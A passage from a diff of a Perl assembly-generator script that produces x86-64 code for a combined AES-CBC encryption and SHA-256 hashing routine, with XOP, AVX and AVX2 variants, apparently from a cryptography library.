+	' &vaesenc	($inout,$inout,$roundkey);'.
+	 '&vmovdqu	($roundkey,"0xe0-0x80($inp)");',
+
+	'&vpor		($iv,$iv,$temp);'.
+	' &vaesenclast	($temp,$inout,$roundkey);'.
+	' &vmovdqu	($roundkey,"0x00-0x80($inp)");'
+
+##	&mov		($inp,$_inp);
+##	&mov		($out,$_out);
+##	&vpand		($temp,$temp,$mask14);
+##	&vpor		($iv,$iv,$temp);
+##	&vmovdqu	($iv,($out,$inp);
+##	&lea		(inp,16($inp));
+);
+
+my $a4=$T1;
+my ($a,$b,$c,$d,$e,$f,$g,$h);
+
+sub AUTOLOAD()		# thunk [simplified] 32-bit style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
+  my $arg = pop;
+    $arg = "\$$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
+}
+
+sub body_00_15 () {
+	(
+	'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
+
+	'&ror	($a0,$Sigma1[2]-$Sigma1[1])',
+	'&mov	($a,$a1)',
+	'&mov	($a4,$f)',
+
+	'&xor	($a0,$e)',
+	'&ror	($a1,$Sigma0[2]-$Sigma0[1])',
+	'&xor	($a4,$g)',			# f^g
+
+	'&ror	($a0,$Sigma1[1]-$Sigma1[0])',
+	'&xor	($a1,$a)',
+	'&and	($a4,$e)',			# (f^g)&e
+
+	@aesni_cbc_block[$aesni_cbc_idx++].
+	'&xor	($a0,$e)',
+	'&add	($h,$SZ*($i&15)."(%rsp)")',	# h+=X[i]+K[i]
+	'&mov	($a2,$a)',
+
+	'&ror	($a1,$Sigma0[1]-$Sigma0[0])',
+	'&xor	($a4,$g)',			# Ch(e,f,g)=((f^g)&e)^g
+	'&xor	($a2,$b)',			# a^b, b^c in next round
+
+	'&ror	($a0,$Sigma1[0])',		# Sigma1(e)
+	'&add	($h,$a4)',			# h+=Ch(e,f,g)
+	'&and	($a3,$a2)',			# (b^c)&(a^b)
+
+	'&xor	($a1,$a)',
+	'&add	($h,$a0)',			# h+=Sigma1(e)
+	'&xor	($a3,$b)',			# Maj(a,b,c)=Ch(a^b,c,b)
+
+	'&add	($d,$h)',			# d+=h
+	'&ror	($a1,$Sigma0[0])',		# Sigma0(a)
+	'&add	($h,$a3)',			# h+=Maj(a,b,c)
+
+	'&mov	($a0,$d)',
+	'&add	($a1,$h);'.			# h+=Sigma0(a)
+	'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
+	);
+}
+
+if ($avx) {{
+######################################################################
+# XOP code path
+#
+$code.=<<___;
+.type	${func}_xop,\@function,6
+.align	64
+${func}_xop:
+.Lxop_shortcut:
+	mov	`($win64?56:8)`(%rsp),$in0	# load 7th parameter
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	sub	\$`$framesz+$win64*16*10`,%rsp
+	and	\$-64,%rsp		# align stack frame
+
+	shl	\$6,$len
+	sub	$inp,$out		# re-bias
+	sub	$inp,$in0
+	add	$inp,$len		# end of input
+
+	#mov	$inp,$_inp		# saved later
+	mov	$out,$_out
+	mov	$len,$_end
+	#mov	$key,$_key		# remains resident in $inp register
+	mov	$ivp,$_ivp
+	mov	$ctx,$_ctx
+	mov	$in0,$_in0
+	mov	%r11,$_rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,`$framesz+16*0`(%rsp)
+	movaps	%xmm7,`$framesz+16*1`(%rsp)
+	movaps	%xmm8,`$framesz+16*2`(%rsp)
+	movaps	%xmm9,`$framesz+16*3`(%rsp)
+	movaps	%xmm10,`$framesz+16*4`(%rsp)
+	movaps	%xmm11,`$framesz+16*5`(%rsp)
+	movaps	%xmm12,`$framesz+16*6`(%rsp)
+	movaps	%xmm13,`$framesz+16*7`(%rsp)
+	movaps	%xmm14,`$framesz+16*8`(%rsp)
+	movaps	%xmm15,`$framesz+16*9`(%rsp)
+___
+$code.=<<___;
+.Lprologue_xop:
+	vzeroall
+
+	mov	$inp,%r12		# borrow $a4
+	lea	0x80($key),$inp		# size optimization, reassign
+	lea	$TABLE+`$SZ*2*$rounds+32`(%rip),%r13	# borrow $a0
+	mov	0xf0-0x80($inp),%r14d	# rounds, borrow $a1
+	mov	$ctx,%r15		# borrow $a2
+	mov	$in0,%rsi		# borrow $a3
+	vmovdqu	($ivp),$iv		# load IV
+	sub	\$9,%r14
+
+	mov	$SZ*0(%r15),$A
+	mov	$SZ*1(%r15),$B
+	mov	$SZ*2(%r15),$C
+	mov	$SZ*3(%r15),$D
+	mov	$SZ*4(%r15),$E
+	mov	$SZ*5(%r15),$F
+	mov	$SZ*6(%r15),$G
+	mov	$SZ*7(%r15),$H
+
+	vmovdqa	0x00(%r13,%r14,8),$mask14
+	vmovdqa	0x10(%r13,%r14,8),$mask12
+	vmovdqa	0x20(%r13,%r14,8),$mask10
+	vmovdqu	0x00-0x80($inp),$roundkey
+	jmp	.Lloop_xop
+___
+					if ($SZ==4) {	# SHA256
+    my @X = map("%xmm$_",(0..3));
+    my ($t0,$t1,$t2,$t3) = map("%xmm$_",(4..7));
+
+$code.=<<___;
+.align	16
+.Lloop_xop:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	0x00(%rsi,%r12),@X[0]
+	vmovdqu	0x10(%rsi,%r12),@X[1]
+	vmovdqu	0x20(%rsi,%r12),@X[2]
+	vmovdqu	0x30(%rsi,%r12),@X[3]
+	vpshufb	$t3,@X[0],@X[0]
+	lea	$TABLE(%rip),$Tbl
+	vpshufb	$t3,@X[1],@X[1]
+	vpshufb	$t3,@X[2],@X[2]
+	vpaddd	0x00($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[3],@X[3]
+	vpaddd	0x20($Tbl),@X[1],$t1
+	vpaddd	0x40($Tbl),@X[2],$t2
+	vpaddd	0x60($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	mov	$A,$a1
+	vmovdqa	$t1,0x10(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x20(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x30(%rsp)
+	mov	$E,$a0
+	jmp	.Lxop_00_47
+
+.align	16
+.Lxop_00_47:
+	sub	\$-16*2*$SZ,$Tbl	# size optimization
+	vmovdqu	(%r12),$inout		# $a4
+	mov	%r12,$_inp		# $a4
+___
+sub XOP_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 104 instructions
+
+	&vpalignr	($t0,@X[1],@X[0],$SZ);	# X[1..4]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpalignr	($t3,@X[3],@X[2],$SZ);	# X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vprotd		($t1,$t0,8*$SZ-$sigma0[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpsrld		($t0,$t0,$sigma0[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpaddd	(@X[0],@X[0],$t3);	# X[0..3] += X[9..12]
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vprotd		($t2,$t1,$sigma0[1]-$sigma0[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpxor		($t0,$t0,$t1);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t3,@X[3],8*$SZ-$sigma1[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpxor		($t0,$t0,$t2);		# sigma0(X[1..4])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpsrld	($t2,@X[3],$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		(@X[0],@X[0],$t0);	# X[0..3] += sigma0(X[1..4])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t1,$t3,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t1);		# sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpsrldq	($t3,$t3,8);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		(@X[0],@X[0],$t3);	# X[0..1] += sigma1(X[14..15])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t3,@X[0],8*$SZ-$sigma1[1]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpsrld	($t2,@X[0],$sigma1[2]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vprotd	($t1,$t3,$sigma1[1]-$sigma1[0]);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t2);
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	 &vpxor		($t3,$t3,$t1);		# sigma1(X[16..17])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpslldq	($t3,$t3,8);		# 22 instructions
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		(@X[0],@X[0],$t3);	# X[2..3] += sigma1(X[16..17])
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	  eval(shift(@insns));
+	&vpaddd		($t2,@X[0],16*2*$j."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(16*$j."(%rsp)",$t2);
+}
+
+    $aesni_cbc_idx=0;
+    for ($i=0,$j=0; $j<4; $j++) {
+	&XOP_256_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+    	&mov		("%r12",$_inp);		# borrow $a4
+	&vpand		($temp,$temp,$mask14);
+	&mov		("%r15",$_out);		# borrow $a2
+	&vpor		($iv,$iv,$temp);
+	&vmovdqu	("(%r15,%r12)",$iv);	# write output
+	&lea		("%r12","16(%r12)");	# inp++
+
+	&cmpb	($SZ-1+16*2*$SZ."($Tbl)",0);
+	&jne	(".Lxop_00_47");
+
+	&vmovdqu	($inout,"(%r12)");
+	&mov		($_inp,"%r12");
+
+    $aesni_cbc_idx=0;
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+					}
+$code.=<<___;
+	mov	$_inp,%r12		# borrow $a4
+	mov	$_out,%r13		# borrow $a0
+	mov	$_ctx,%r15		# borrow $a2
+	mov	$_in0,%rsi		# borrow $a3
+
+	vpand	$mask14,$temp,$temp
+	mov	$a1,$A
+	vpor	$temp,$iv,$iv
+	vmovdqu	$iv,(%r13,%r12)		# write output
+	lea	16(%r12),%r12		# inp++
+
+	add	$SZ*0(%r15),$A
+	add	$SZ*1(%r15),$B
+	add	$SZ*2(%r15),$C
+	add	$SZ*3(%r15),$D
+	add	$SZ*4(%r15),$E
+	add	$SZ*5(%r15),$F
+	add	$SZ*6(%r15),$G
+	add	$SZ*7(%r15),$H
+
+	cmp	$_end,%r12
+
+	mov	$A,$SZ*0(%r15)
+	mov	$B,$SZ*1(%r15)
+	mov	$C,$SZ*2(%r15)
+	mov	$D,$SZ*3(%r15)
+	mov	$E,$SZ*4(%r15)
+	mov	$F,$SZ*5(%r15)
+	mov	$G,$SZ*6(%r15)
+	mov	$H,$SZ*7(%r15)
+
+	jb	.Lloop_xop
+
+	mov	$_ivp,$ivp
+	mov	$_rsp,%rsi
+	vmovdqu	$iv,($ivp)		# output IV
+	vzeroall
+___
+$code.=<<___ if ($win64);
+	movaps	`$framesz+16*0`(%rsp),%xmm6
+	movaps	`$framesz+16*1`(%rsp),%xmm7
+	movaps	`$framesz+16*2`(%rsp),%xmm8
+	movaps	`$framesz+16*3`(%rsp),%xmm9
+	movaps	`$framesz+16*4`(%rsp),%xmm10
+	movaps	`$framesz+16*5`(%rsp),%xmm11
+	movaps	`$framesz+16*6`(%rsp),%xmm12
+	movaps	`$framesz+16*7`(%rsp),%xmm13
+	movaps	`$framesz+16*8`(%rsp),%xmm14
+	movaps	`$framesz+16*9`(%rsp),%xmm15
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_xop:
+	ret
+.size	${func}_xop,.-${func}_xop
+___
+######################################################################
+# AVX+shrd code path
+#
+local *ror = sub { &shrd(@_[0],@_) };
+
+$code.=<<___;
+.type	${func}_avx,\@function,6
+.align	64
+${func}_avx:
+.Lavx_shortcut:
+	mov	`($win64?56:8)`(%rsp),$in0	# load 7th parameter
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	sub	\$`$framesz+$win64*16*10`,%rsp
+	and	\$-64,%rsp		# align stack frame
+
+	shl	\$6,$len
+	sub	$inp,$out		# re-bias
+	sub	$inp,$in0
+	add	$inp,$len		# end of input
+
+	#mov	$inp,$_inp		# saved later
+	mov	$out,$_out
+	mov	$len,$_end
+	#mov	$key,$_key		# remains resident in $inp register
+	mov	$ivp,$_ivp
+	mov	$ctx,$_ctx
+	mov	$in0,$_in0
+	mov	%r11,$_rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,`$framesz+16*0`(%rsp)
+	movaps	%xmm7,`$framesz+16*1`(%rsp)
+	movaps	%xmm8,`$framesz+16*2`(%rsp)
+	movaps	%xmm9,`$framesz+16*3`(%rsp)
+	movaps	%xmm10,`$framesz+16*4`(%rsp)
+	movaps	%xmm11,`$framesz+16*5`(%rsp)
+	movaps	%xmm12,`$framesz+16*6`(%rsp)
+	movaps	%xmm13,`$framesz+16*7`(%rsp)
+	movaps	%xmm14,`$framesz+16*8`(%rsp)
+	movaps	%xmm15,`$framesz+16*9`(%rsp)
+___
+$code.=<<___;
+.Lprologue_avx:
+	vzeroall
+
+	mov	$inp,%r12		# borrow $a4
+	lea	0x80($key),$inp		# size optimization, reassign
+	lea	$TABLE+`$SZ*2*$rounds+32`(%rip),%r13	# borrow $a0
+	mov	0xf0-0x80($inp),%r14d	# rounds, borrow $a1
+	mov	$ctx,%r15		# borrow $a2
+	mov	$in0,%rsi		# borrow $a3
+	vmovdqu	($ivp),$iv		# load IV
+	sub	\$9,%r14
+
+	mov	$SZ*0(%r15),$A
+	mov	$SZ*1(%r15),$B
+	mov	$SZ*2(%r15),$C
+	mov	$SZ*3(%r15),$D
+	mov	$SZ*4(%r15),$E
+	mov	$SZ*5(%r15),$F
+	mov	$SZ*6(%r15),$G
+	mov	$SZ*7(%r15),$H
+
+	vmovdqa	0x00(%r13,%r14,8),$mask14
+	vmovdqa	0x10(%r13,%r14,8),$mask12
+	vmovdqa	0x20(%r13,%r14,8),$mask10
+	vmovdqu	0x00-0x80($inp),$roundkey
+___
+					if ($SZ==4) {	# SHA256
+    my @X = map("%xmm$_",(0..3));
+    my ($t0,$t1,$t2,$t3) = map("%xmm$_",(4..7));
+
+$code.=<<___;
+	jmp	.Lloop_avx
+.align	16
+.Lloop_avx:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	0x00(%rsi,%r12),@X[0]
+	vmovdqu	0x10(%rsi,%r12),@X[1]
+	vmovdqu	0x20(%rsi,%r12),@X[2]
+	vmovdqu	0x30(%rsi,%r12),@X[3]
+	vpshufb	$t3,@X[0],@X[0]
+	lea	$TABLE(%rip),$Tbl
+	vpshufb	$t3,@X[1],@X[1]
+	vpshufb	$t3,@X[2],@X[2]
+	vpaddd	0x00($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[3],@X[3]
+	vpaddd	0x20($Tbl),@X[1],$t1
+	vpaddd	0x40($Tbl),@X[2],$t2
+	vpaddd	0x60($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	mov	$A,$a1
+	vmovdqa	$t1,0x10(%rsp)
+	mov	$B,$a3
+	vmovdqa	$t2,0x20(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x30(%rsp)
+	mov	$E,$a0
+	jmp	.Lavx_00_47
+
+.align	16
+.Lavx_00_47:
+	sub	\$-16*2*$SZ,$Tbl	# size optimization
+	vmovdqu	(%r12),$inout		# $a4
+	mov	%r12,$_inp		# $a4
+___
+sub Xupdate_256_AVX () {
+	(
+	'&vpalignr	($t0,@X[1],@X[0],$SZ)',	# X[1..4]
+	 '&vpalignr	($t3,@X[3],@X[2],$SZ)',	# X[9..12]
+	'&vpsrld	($t2,$t0,$sigma0[0]);',
+	 '&vpaddd	(@X[0],@X[0],$t3)',	# X[0..3] += X[9..12]
+	'&vpsrld	($t3,$t0,$sigma0[2])',
+	'&vpslld	($t1,$t0,8*$SZ-$sigma0[1]);',
+	'&vpxor		($t0,$t3,$t2)',
+	 '&vpshufd	($t3,@X[3],0b11111010)',# X[14..15]
+	'&vpsrld	($t2,$t2,$sigma0[1]-$sigma0[0]);',
+	'&vpxor		($t0,$t0,$t1)',
+	'&vpslld	($t1,$t1,$sigma0[1]-$sigma0[0]);',
+	'&vpxor		($t0,$t0,$t2)',
+	 '&vpsrld	($t2,$t3,$sigma1[2]);',
+	'&vpxor		($t0,$t0,$t1)',		# sigma0(X[1..4])
+	 '&vpsrlq	($t3,$t3,$sigma1[0]);',
+	'&vpaddd	(@X[0],@X[0],$t0)',	# X[0..3] += sigma0(X[1..4])
+	 '&vpxor	($t2,$t2,$t3);',
+	 '&vpsrlq	($t3,$t3,$sigma1[1]-$sigma1[0])',
+	 '&vpxor	($t2,$t2,$t3)',		# sigma1(X[14..15])
+	 '&vpshufd	($t2,$t2,0b10000100)',
+	 '&vpsrldq	($t2,$t2,8)',
+	'&vpaddd	(@X[0],@X[0],$t2)',	# X[0..1] += sigma1(X[14..15])
+	 '&vpshufd	($t3,@X[0],0b01010000)',# X[16..17]
+	 '&vpsrld	($t2,$t3,$sigma1[2])',
+	 '&vpsrlq	($t3,$t3,$sigma1[0])',
+	 '&vpxor	($t2,$t2,$t3);',
+	 '&vpsrlq	($t3,$t3,$sigma1[1]-$sigma1[0])',
+	 '&vpxor	($t2,$t2,$t3)',
+	 '&vpshufd	($t2,$t2,0b11101000)',
+	 '&vpslldq	($t2,$t2,8)',
+	'&vpaddd	(@X[0],@X[0],$t2)'	# X[2..3] += sigma1(X[16..17])
+	);
+}
+
+sub AVX_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 104 instructions
+
+	foreach (Xupdate_256_AVX()) {		# 29 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	}
+	&vpaddd		($t2,@X[0],16*2*$j."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
+	&vmovdqa	(16*$j."(%rsp)",$t2);
+}
+
+    $aesni_cbc_idx=0;
+    for ($i=0,$j=0; $j<4; $j++) {
+	&AVX_256_00_47($j,\&body_00_15,@X);
+	push(@X,shift(@X));			# rotate(@X)
+    }
+    	&mov		("%r12",$_inp);		# borrow $a4
+	&vpand		($temp,$temp,$mask14);
+	&mov		("%r15",$_out);		# borrow $a2
+	&vpor		($iv,$iv,$temp);
+	&vmovdqu	("(%r15,%r12)",$iv);	# write output
+	&lea		("%r12","16(%r12)");	# inp++
+
+	&cmpb	($SZ-1+16*2*$SZ."($Tbl)",0);
+	&jne	(".Lavx_00_47");
+
+	&vmovdqu	($inout,"(%r12)");
+	&mov		($_inp,"%r12");
+
+    $aesni_cbc_idx=0;
+    for ($i=0; $i<16; ) {
+	foreach(body_00_15()) { eval; }
+    }
+
+					}
+$code.=<<___;
+	mov	$_inp,%r12		# borrow $a4
+	mov	$_out,%r13		# borrow $a0
+	mov	$_ctx,%r15		# borrow $a2
+	mov	$_in0,%rsi		# borrow $a3
+
+	vpand	$mask14,$temp,$temp
+	mov	$a1,$A
+	vpor	$temp,$iv,$iv
+	vmovdqu	$iv,(%r13,%r12)		# write output
+	lea	16(%r12),%r12		# inp++
+
+	add	$SZ*0(%r15),$A
+	add	$SZ*1(%r15),$B
+	add	$SZ*2(%r15),$C
+	add	$SZ*3(%r15),$D
+	add	$SZ*4(%r15),$E
+	add	$SZ*5(%r15),$F
+	add	$SZ*6(%r15),$G
+	add	$SZ*7(%r15),$H
+
+	cmp	$_end,%r12
+
+	mov	$A,$SZ*0(%r15)
+	mov	$B,$SZ*1(%r15)
+	mov	$C,$SZ*2(%r15)
+	mov	$D,$SZ*3(%r15)
+	mov	$E,$SZ*4(%r15)
+	mov	$F,$SZ*5(%r15)
+	mov	$G,$SZ*6(%r15)
+	mov	$H,$SZ*7(%r15)
+	jb	.Lloop_avx
+
+	mov	$_ivp,$ivp
+	mov	$_rsp,%rsi
+	vmovdqu	$iv,($ivp)		# output IV
+	vzeroall
+___
+$code.=<<___ if ($win64);
+	movaps	`$framesz+16*0`(%rsp),%xmm6
+	movaps	`$framesz+16*1`(%rsp),%xmm7
+	movaps	`$framesz+16*2`(%rsp),%xmm8
+	movaps	`$framesz+16*3`(%rsp),%xmm9
+	movaps	`$framesz+16*4`(%rsp),%xmm10
+	movaps	`$framesz+16*5`(%rsp),%xmm11
+	movaps	`$framesz+16*6`(%rsp),%xmm12
+	movaps	`$framesz+16*7`(%rsp),%xmm13
+	movaps	`$framesz+16*8`(%rsp),%xmm14
+	movaps	`$framesz+16*9`(%rsp),%xmm15
+___
+$code.=<<___;
+	mov	(%rsi),%r15
+	mov	8(%rsi),%r14
+	mov	16(%rsi),%r13
+	mov	24(%rsi),%r12
+	mov	32(%rsi),%rbp
+	mov	40(%rsi),%rbx
+	lea	48(%rsi),%rsp
+.Lepilogue_avx:
+	ret
+.size	${func}_avx,.-${func}_avx
+___
+
+if ($avx>1) {{
+######################################################################
+# AVX2+BMI code path
+#
+my $a5=$SZ==4?"%esi":"%rsi";	# zap $inp 
+my $PUSH8=8*2*$SZ;
+use integer;
+
+sub bodyx_00_15 () {
+	# at start $a1 should be zero, $a3 - $b^$c and $a4 copy of $f
+	(
+	'($a,$b,$c,$d,$e,$f,$g,$h)=@ROT;'.
+
+	'&add	($h,(32*($i/(16/$SZ))+$SZ*($i%(16/$SZ)))%$PUSH8.$base)',    # h+=X[i]+K[i]
+	'&and	($a4,$e)',		# f&e
+	'&rorx	($a0,$e,$Sigma1[2])',
+	'&rorx	($a2,$e,$Sigma1[1])',
+
+	'&lea	($a,"($a,$a1)")',	# h+=Sigma0(a) from the past
+	'&lea	($h,"($h,$a4)")',
+	'&andn	($a4,$e,$g)',		# ~e&g
+	'&xor	($a0,$a2)',
+
+	'&rorx	($a1,$e,$Sigma1[0])',
+	'&lea	($h,"($h,$a4)")',	# h+=Ch(e,f,g)=(e&f)+(~e&g)
+	'&xor	($a0,$a1)',		# Sigma1(e)
+	'&mov	($a2,$a)',
+
+	'&rorx	($a4,$a,$Sigma0[2])',
+	'&lea	($h,"($h,$a0)")',	# h+=Sigma1(e)
+	'&xor	($a2,$b)',		# a^b, b^c in next round
+	'&rorx	($a1,$a,$Sigma0[1])',
+
+	'&rorx	($a0,$a,$Sigma0[0])',
+	'&lea	($d,"($d,$h)")',	# d+=h
+	'&and	($a3,$a2)',		# (b^c)&(a^b)
+	@aesni_cbc_block[$aesni_cbc_idx++].
+	'&xor	($a1,$a4)',
+
+	'&xor	($a3,$b)',		# Maj(a,b,c)=Ch(a^b,c,b)
+	'&xor	($a1,$a0)',		# Sigma0(a)
+	'&lea	($h,"($h,$a3)");'.	# h+=Maj(a,b,c)
+	'&mov	($a4,$e)',		# copy of f in future
+
+	'($a2,$a3) = ($a3,$a2); unshift(@ROT,pop(@ROT)); $i++;'
+	);
+	# and at the finish one has to $a+=$a1
+}
+
+$code.=<<___;
+.type	${func}_avx2,\@function,6
+.align	64
+${func}_avx2:
+.Lavx2_shortcut:
+	mov	`($win64?56:8)`(%rsp),$in0	# load 7th parameter
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	mov	%rsp,%r11		# copy %rsp
+	sub	\$`2*$SZ*$rounds+8*8+$win64*16*10`,%rsp
+	and	\$-256*$SZ,%rsp		# align stack frame
+	add	\$`2*$SZ*($rounds-8)`,%rsp
+
+	shl	\$6,$len
+	sub	$inp,$out		# re-bias
+	sub	$inp,$in0
+	add	$inp,$len		# end of input
+
+	#mov	$inp,$_inp		# saved later
+	#mov	$out,$_out		# kept in $offload
+	mov	$len,$_end
+	#mov	$key,$_key		# remains resident in $inp register
+	mov	$ivp,$_ivp
+	mov	$ctx,$_ctx
+	mov	$in0,$_in0
+	mov	%r11,$_rsp
+___
+$code.=<<___ if ($win64);
+	movaps	%xmm6,`$framesz+16*0`(%rsp)
+	movaps	%xmm7,`$framesz+16*1`(%rsp)
+	movaps	%xmm8,`$framesz+16*2`(%rsp)
+	movaps	%xmm9,`$framesz+16*3`(%rsp)
+	movaps	%xmm10,`$framesz+16*4`(%rsp)
+	movaps	%xmm11,`$framesz+16*5`(%rsp)
+	movaps	%xmm12,`$framesz+16*6`(%rsp)
+	movaps	%xmm13,`$framesz+16*7`(%rsp)
+	movaps	%xmm14,`$framesz+16*8`(%rsp)
+	movaps	%xmm15,`$framesz+16*9`(%rsp)
+___
+$code.=<<___;
+.Lprologue_avx2:
+	vzeroall
+
+	mov	$inp,%r13		# borrow $a0
+	vpinsrq	\$1,$out,$offload,$offload
+	lea	0x80($key),$inp		# size optimization, reassign
+	lea	$TABLE+`$SZ*2*$rounds+32`(%rip),%r12	# borrow $a4
+	mov	0xf0-0x80($inp),%r14d	# rounds, borrow $a1
+	mov	$ctx,%r15		# borrow $a2
+	mov	$in0,%rsi		# borrow $a3
+	vmovdqu	($ivp),$iv		# load IV
+	lea	-9(%r14),%r14
+
+	vmovdqa	0x00(%r12,%r14,8),$mask14
+	vmovdqa	0x10(%r12,%r14,8),$mask12
+	vmovdqa	0x20(%r12,%r14,8),$mask10
+
+	sub	\$-16*$SZ,%r13		# inp++, size optimization
+	mov	$SZ*0(%r15),$A
+	lea	(%rsi,%r13),%r12	# borrow $a0
+	mov	$SZ*1(%r15),$B
+	cmp	$len,%r13		# $_end
+	mov	$SZ*2(%r15),$C
+	cmove	%rsp,%r12		# next block or random data
+	mov	$SZ*3(%r15),$D
+	mov	$SZ*4(%r15),$E
+	mov	$SZ*5(%r15),$F
+	mov	$SZ*6(%r15),$G
+	mov	$SZ*7(%r15),$H
+	vmovdqu	0x00-0x80($inp),$roundkey
+___
+					if ($SZ==4) {	# SHA256
+    my @X = map("%ymm$_",(0..3));
+    my ($t0,$t1,$t2,$t3) = map("%ymm$_",(4..7));
+
+$code.=<<___;
+	jmp	.Loop_avx2
+.align	16
+.Loop_avx2:
+	vmovdqa	$TABLE+`$SZ*2*$rounds`(%rip),$t3
+	vmovdqu	-16*$SZ+0(%rsi,%r13),%xmm0
+	vmovdqu	-16*$SZ+16(%rsi,%r13),%xmm1
+	vmovdqu	-16*$SZ+32(%rsi,%r13),%xmm2
+	vmovdqu	-16*$SZ+48(%rsi,%r13),%xmm3
+
+	vinserti128	\$1,(%r12),@X[0],@X[0]
+	vinserti128	\$1,16(%r12),@X[1],@X[1]
+	 vpshufb	$t3,@X[0],@X[0]
+	vinserti128	\$1,32(%r12),@X[2],@X[2]
+	 vpshufb	$t3,@X[1],@X[1]
+	vinserti128	\$1,48(%r12),@X[3],@X[3]
+
+	lea	$TABLE(%rip),$Tbl
+	vpshufb	$t3,@X[2],@X[2]
+	lea	-16*$SZ(%r13),%r13
+	vpaddd	0x00($Tbl),@X[0],$t0
+	vpshufb	$t3,@X[3],@X[3]
+	vpaddd	0x20($Tbl),@X[1],$t1
+	vpaddd	0x40($Tbl),@X[2],$t2
+	vpaddd	0x60($Tbl),@X[3],$t3
+	vmovdqa	$t0,0x00(%rsp)
+	xor	$a1,$a1
+	vmovdqa	$t1,0x20(%rsp)
+	lea	-$PUSH8(%rsp),%rsp
+	mov	$B,$a3
+	vmovdqa	$t2,0x00(%rsp)
+	xor	$C,$a3			# magic
+	vmovdqa	$t3,0x20(%rsp)
+	mov	$F,$a4
+	sub	\$-16*2*$SZ,$Tbl	# size optimization
+	jmp	.Lavx2_00_47
+
+.align	16
+.Lavx2_00_47:
+	vmovdqu	(%r13),$inout
+	vpinsrq	\$0,%r13,$offload,$offload
+___
+
+sub AVX2_256_00_47 () {
+my $j = shift;
+my $body = shift;
+my @X = @_;
+my @insns = (&$body,&$body,&$body,&$body);	# 96 instructions
+my $base = "+2*$PUSH8(%rsp)";
+
+	&lea	("%rsp","-$PUSH8(%rsp)")	if (($j%2)==0);
+	foreach (Xupdate_256_AVX()) {		# 29 instructions
+	    eval;
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	    eval(shift(@insns));
+	}
+	&vpaddd		($t2,@X[0],16*2*$j."($Tbl)");
+	  foreach (@insns) { eval; }		# remaining instructions
